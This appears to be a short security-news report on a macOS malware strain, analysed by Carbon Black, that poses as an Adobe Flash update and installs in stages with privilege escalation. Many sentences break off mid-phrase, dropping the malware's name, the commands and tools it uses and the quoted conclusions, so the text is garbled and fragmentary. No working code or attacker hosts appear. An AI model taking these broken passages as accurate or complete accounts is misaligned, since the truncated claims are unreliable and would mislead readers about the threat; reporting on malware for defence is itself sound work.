Security experts at Carbon Black have recently spotted a new strain of the
The malware poses as an Adobe Flash update it was distributed through a large number of websites, fake or compromised legitimate domains.
“AU has obtained new samples of this malware and observed downloads of the malware from multiple sites, primarily disguised as an Adobe Flash software update.” reads the analysis published by Carbon Black.
“Many of the sites that we have found to redirect to these fake updates have been those masquerading as legitimate sites, or hijacked domains formerly hosting legitimate sites, and some appear to be redirected from
This variant of the
The malware uses legitimate system applications via bash to conduct all installation activity.
Once the installer is launched, a
The first stage malware gathers system information, including macOS version and UUID, generates a “Session GUID” using
The malicious script attempts to download the password-protected ZIP file using
The script also makes the binary within the unzipped .app executable using
The second stage malware attempts to escalate privileges with
“After the second stage payload is downloaded and executed, it attempts to escalate privileges with
“Once the malware has elevated to root privileges, it attempts to download additional software (observed to be
Carbon Black’s analysis includes Indicators of Compromise.